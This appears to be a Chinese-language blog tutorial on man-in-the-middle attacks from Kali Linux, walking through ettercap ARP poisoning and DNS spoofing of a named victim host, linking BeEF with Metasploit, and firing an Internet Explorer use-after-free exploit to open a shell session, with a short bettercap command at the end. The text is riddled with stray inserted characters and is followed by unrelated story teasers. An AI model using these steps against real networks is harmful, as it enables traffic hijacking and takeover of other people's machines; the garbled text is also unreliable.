kali?2.0下的中間人攻擊

圖片發(fā)自簡書App



前言,提起中間人攻擊滞详,首先我們會想到老牌的ettercap凛俱,今天我們來介紹幾種內(nèi)網(wǎng)中間人攻擊的工具

  ettercap,bettercap,mitmf(當(dāng)然還需要beef和metasploit配合紊馏,效果更佳)

  0x01 ettercap

  ettercap是LINUX下一個強(qiáng)大的 欺騙工具,當(dāng)然WINDOWS也能用蒲犬,你能夠用飛一般的速度創(chuàng)建和發(fā)送偽造的包.讓你發(fā)送從網(wǎng)絡(luò)適配器到應(yīng)用軟件各種級別的包.綁定監(jiān)聽數(shù)據(jù)到一個本地端口:從一個客戶端連接到這個端口并且能夠?yàn)椴恢赖膮f(xié)議解碼或者把數(shù)據(jù)插進(jìn)去(只有在arp為基礎(chǔ)模式里才能用)

  metasploit配合beef+ettercap局域網(wǎng)dns劫持拿shell

  所用工具:metasploit beef ettercap

  首先我們通過

  ettercap -G 打開我們的ettercap工具


圖片發(fā)自簡書App



指定網(wǎng)卡 Sniff -> Unified sniffing -> Ok


然后通過 Hosts->Scan for hosts 掃描一下局域網(wǎng)的機(jī)器,通過 Hosts->Hosts list 顯示出來,如圖


其中 192.168.2.1為網(wǎng)關(guān),192.168.2.105為受害機(jī)器

  我們選中192.168.2.105 Add to Target 1

  選中網(wǎng)關(guān) 192.168.2.1 Add to Target 2

  如圖


選中 Mitm -> Arp poisoning -> 勾選Sniff remote connections 點(diǎn)ok 如圖


選中 Plugins -> Manage the Plugins -> 雙擊 dns_spoof


這樣我們就完成了受害機(jī)器的dns劫持過程,我們修改一下

  vim /etc/ettercap/etter.dns


使其無論打開什么網(wǎng)址,其實(shí)打開的都是 192.168.1.104 ok 一切準(zhǔn)備就緒,我們開始運(yùn)行ettercap 如圖:


好了,我們在受害機(jī)器了ping一下,看看是否劫持成功


沒有問題,所有的網(wǎng)址都沒劫持到192.168.2.104上

  接下來,我們使用metasploit 和 beef 工具,利用xp下的ie漏洞拿shell

  剛開始的時候,需要beef和metasploit關(guān)聯(lián)一下

  我們配置一下

  vim /usr/share/beef-xss/config.yaml


開啟metasploit 拓展

  然后配置一下拓展下的metasploit配置文件

  vim /usr/share/beef-xss/extensions/metasploit/config.yaml


把ip填寫成攻擊機(jī)器的ip,把metasploit路徑填上,保存.

  這就完成了beef和metasploit的關(guān)聯(lián)

  然后把metasploit的服務(wù)開啟朱监,

  由于使用PostgreSQL作為數(shù)據(jù)庫,因此原叮,必須先運(yùn)行它赫编。

  root@kali:~# service postgresql start

  啟動Metasploit服務(wù)

  root@kali:~# service metasploit start

  在命令行下用msfconsole把控制臺打開,接著加載beEF奋隶。所用命令為:“l(fā)oad msgrpc ServerHost=192.168.2.104 Pass=abc123”


下面我們來啟動beef

  cd /usr/share/beef-xss/ ./beef -x

  我們看到 metasploit 已經(jīng)加載進(jìn)來了


我們通過 http://192.168.2.104:3000/ui/panel 打開beef界面,用戶名和密碼都是beef


好了,現(xiàn)在一切都已經(jīng)準(zhǔn)備好,讓我們用php編寫一個程序,去搞shell吧

  vim /var/www/index.php

  我們再進(jìn)入msf

  use exploit/windows/browser/ie_execcommand_uaf set SRVHOST 192.168.2.104 set URIPATH / exploit

  這樣就完成了監(jiān)聽,一旦目標(biāo)機(jī)器打開網(wǎng)站


給他一個跳轉(zhuǎn),讓它跳轉(zhuǎn)到 http://192.168.2.104:8080

  看一眼我們的metaspolt 已經(jīng)拿到了


使用sessions -i id號 控制目標(biāo)機(jī)器

  好了 最后一張圖 完結(jié) 累死


0x02 bettercap

  bBetterCap是一個功能強(qiáng)大擂送、模塊化、輕便的MiTM框架达布,可以用來對網(wǎng)絡(luò)開展各種類型的中間人攻擊(Man-In-The-Middle)团甲。它也可以幫你實(shí)時地操作HTTP和HTTPS流量,以及其他更多功能黍聂。

  bettercap -I eth0 -X

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末躺苦,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子产还,更是在濱河造成了極大的恐慌匹厘,老刑警劉巖,帶你破解...
    沈念sama閱讀 212,222評論 6 493
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件脐区,死亡現(xiàn)場離奇詭異愈诚,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)牛隅,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,455評論 3 385
  • 文/潘曉璐 我一進(jìn)店門炕柔,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人媒佣,你說我怎么就攤上這事匕累。” “怎么了默伍?”我有些...
    開封第一講書人閱讀 157,720評論 0 348
  • 文/不壞的土叔 我叫張陵欢嘿,是天一觀的道長。 經(jīng)常有香客問我也糊,道長炼蹦,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 56,568評論 1 284
  • 正文 為了忘掉前任狸剃,我火速辦了婚禮掐隐,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘钞馁。我一直安慰自己瑟枫,他們只是感情好斗搞,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,696評論 6 386
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著慷妙,像睡著了一般僻焚。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上膝擂,一...
    開封第一講書人閱讀 49,879評論 1 290
  • 那天虑啤,我揣著相機(jī)與錄音,去河邊找鬼架馋。 笑死狞山,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的叉寂。 我是一名探鬼主播萍启,決...
    沈念sama閱讀 39,028評論 3 409
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼屏鳍!你這毒婦竟也來了勘纯?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 37,773評論 0 268
  • 序言:老撾萬榮一對情侶失蹤钓瞭,失蹤者是張志新(化名)和其女友劉穎驳遵,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體山涡,經(jīng)...
    沈念sama閱讀 44,220評論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡堤结,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,550評論 2 327
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了鸭丛。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片竞穷。...
    茶點(diǎn)故事閱讀 38,697評論 1 341
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖鳞溉,靈堂內(nèi)的尸體忽然破棺而出瘾带,到底是詐尸還是另有隱情,我是刑警寧澤穿挨,帶...
    沈念sama閱讀 34,360評論 4 332
  • 正文 年R本政府宣布月弛,位于F島的核電站肴盏,受9級特大地震影響科盛,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜菜皂,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 40,002評論 3 315
  • 文/蒙蒙 一贞绵、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧恍飘,春花似錦榨崩、人聲如沸谴垫。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,782評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽翩剪。三九已至,卻和暖如春彩郊,著一層夾襖步出監(jiān)牢的瞬間前弯,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,010評論 1 266
  • 我被黑心中介騙來泰國打工秫逝, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留恕出,地道東北人。 一個月前我還...
    沈念sama閱讀 46,433評論 2 360
  • 正文 我出身青樓违帆,卻偏偏與公主長得像浙巫,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子刷后,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,587評論 2 350

推薦閱讀更多精彩內(nèi)容

  • 線程 線程是用來執(zhí)行任務(wù)的的畴,線程徹底執(zhí)行完任務(wù)A才能去執(zhí)行任務(wù)B。為了同時執(zhí)行兩個任務(wù)惠险,產(chǎn)生了多線程苗傅。 進(jìn)程 進(jìn)程...
    流水點(diǎn)點(diǎn)閱讀 285評論 2 0
  • I’m just a little bit caught in the middle 我有點(diǎn)兒左右為難 Life ...
    67fbaec5208f閱讀 213評論 0 0
  • 前幾天回到爺爺家隨手拍了一些風(fēng)景 因?yàn)椴皇菍I(yè)攝影 所以只是自己欣賞 隨手一拍的小貓 你需要仔細(xì)尋找它 是不是很可...
    浪里個浪Olivia閱讀 112評論 0 1